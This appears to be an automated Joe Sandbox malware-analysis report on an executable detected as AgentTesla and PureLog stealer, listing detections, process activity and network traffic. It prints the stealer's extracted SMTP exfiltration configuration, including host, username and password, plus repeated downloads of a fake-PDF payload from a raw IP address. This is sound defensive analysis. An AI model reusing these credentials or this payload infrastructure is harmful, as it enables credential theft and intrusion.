Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NEW_ORDER_12-18-23.exe

Overview

General Information

Sample name:NEW_ORDER_12-18-23.exe
Analysis ID:1363933
MD5:70fac030623deb6181201fd0ca321bb4
SHA1:f76fa53071642b4af732b2388408a8c8b8ad15f3
SHA256:cfc1cd526a745e9154cda0c23f0cce1999ec4325af86fc79d3b1072631b17329
Tags:exe
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Downloads files with wrong headers with respect to MIME Content-Type
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • NEW_ORDER_12-18-23.exe (PID: 7272 cmdline: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • NEW_ORDER_12-18-23.exe (PID: 7372 cmdline: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • NEW_ORDER_12-18-23.exe (PID: 7380 cmdline: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • NEW_ORDER_12-18-23.exe (PID: 7388 cmdline: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • NEW_ORDER_12-18-23.exe (PID: 7396 cmdline: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • NEW_ORDER_12-18-23.exe (PID: 7404 cmdline: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • NEW_ORDER_12-18-23.exe (PID: 7412 cmdline: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • NEW_ORDER_12-18-23.exe (PID: 7420 cmdline: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • NEW_ORDER_12-18-23.exe (PID: 7428 cmdline: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • NEW_ORDER_12-18-23.exe (PID: 7436 cmdline: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • NEW_ORDER_12-18-23.exe (PID: 7444 cmdline: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
  • spof.exe (PID: 7500 cmdline: "C:\Users\user\AppData\Roaming\spof.exe" MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 7708 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 7716 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 7724 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 7732 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 7740 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 7748 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 7756 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 7764 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 7772 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 7780 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
  • spof.exe (PID: 7948 cmdline: "C:\Users\user\AppData\Roaming\spof.exe" MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 8012 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 8020 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 8028 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 8036 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 8044 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 8052 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 8060 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 8068 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 8076 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
    • spof.exe (PID: 8084 cmdline: C:\Users\user\AppData\Roaming\spof.exe MD5: 70FAC030623DEB6181201FD0CA321BB4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.asiaparadisehotel.com", "Username": "mangirish@asiaparadisehotel.com", "Password": "H?2=G%Dc0S^Q"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000019.00000002.1968348865.0000012B1C5A2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000019.00000002.1968348865.0000012B1C701000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000019.00000002.1968348865.0000012B1C701000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.1750794274.0000024A11F66000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1750794274.0000024A11F66000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 34 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            25.2.spof.exe.12b1c5a2b28.5.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              11.2.spof.exe.2225b9c2ab8.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                25.2.spof.exe.12b1c52aab8.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  11.2.spof.exe.2225b99aa80.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    25.2.spof.exe.12b1c52aab8.2.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      Click to see the 37 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://45.137.22.163/Akoob.pdfAvira URL Cloud: Label: malware
                      Source: http://45.137.22.163/Akoob.pdf(QuAvira URL Cloud: Label: malware
                      Source: http://45.137.22.163/Akoob.pdf(QAvira URL Cloud: Label: malware
                      Source: http://45.137.22.163Avira URL Cloud: Label: malware
                      Found malware configuration
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.asiaparadisehotel.com", "Username": "mangirish@asiaparadisehotel.com", "Password": "H?2=G%Dc0S^Q"}
                      Multi AV Scanner detection for domain / URL
                      Source: http://45.137.22.163/Akoob.pdfVirustotal: Detection: 12%Perma Link
                      Source: http://45.137.22.163Virustotal: Detection: 15%Perma Link
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\spof.exeReversingLabs: Detection: 27%
                      Source: C:\Users\user\AppData\Roaming\spof.exeVirustotal: Detection: 34%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: NEW_ORDER_12-18-23.exeVirustotal: Detection: 34%Perma Link
                      Source: NEW_ORDER_12-18-23.exeReversingLabs: Detection: 27%
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\spof.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: NEW_ORDER_12-18-23.exeJoe Sandbox ML: detected
                      Source: NEW_ORDER_12-18-23.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1753819644.0000024A7C890000.00000004.08000000.00040000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11DF6000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11EAB000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BA4F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BAC8000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C658000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1753819644.0000024A7C890000.00000004.08000000.00040000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11DF6000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11EAB000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BA4F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BAC8000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C658000.00000004.00000800.00020000.00000000.sdmp

                      Networking

                      barindex
                      Downloads files with wrong headers with respect to MIME Content-Type
                      Source: httpBad PDF prefix: HTTP/1.1 200 OK Content-Type: application/pdf Last-Modified: Mon, 18 Dec 2023 07:44:11 GMT Accept-Ranges: bytes ETag: "8420c6fd8531da1:0" Server: Microsoft-IIS/8.5 Date: Mon, 18 Dec 2023 13:31:04 GMT Content-Length: 665600 Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 70 00 00 00 0c 00 0a 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 08 00 38 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 08 00 34 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 6c 00 6c 00 64 00 2e 00 67 00 64 00 74 00 68 00 41 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 0
                      Source: httpBad PDF prefix: HTTP/1.1 200 OK Content-Type: application/pdf Last-Modified: Mon, 18 Dec 2023 07:44:11 GMT Accept-Ranges: bytes ETag: "8420c6fd8531da1:0" Server: Microsoft-IIS/8.5 Date: Mon, 18 Dec 2023 13:31:19 GMT Content-Length: 665600 Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 70 00 00 00 0c 00 0a 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 08 00 38 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 08 00 34 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 6c 00 6c 00 64 00 2e 00 67 00 64 00 74 00 68 00 41 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 0
                      Source: httpBad PDF prefix: HTTP/1.1 200 OK Content-Type: application/pdf Last-Modified: Mon, 18 Dec 2023 07:44:11 GMT Accept-Ranges: bytes ETag: "8420c6fd8531da1:0" Server: Microsoft-IIS/8.5 Date: Mon, 18 Dec 2023 13:31:25 GMT Content-Length: 665600 Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 70 00 00 00 0c 00 0a 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 08 00 38 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 08 00 34 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 6c 00 6c 00 64 00 2e 00 67 00 64 00 74 00 68 00 41 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 0
                      Source: global trafficHTTP traffic detected: GET /Akoob.pdf HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Akoob.pdf HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Akoob.pdf HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Akoob.pdf HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 45.137.22.163 45.137.22.163
                      Source: Joe Sandbox ViewIP Address: 45.137.22.163 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: global trafficHTTP traffic detected: GET /Akoob.pdf HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Akoob.pdf HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Akoob.pdf HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Akoob.pdf HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
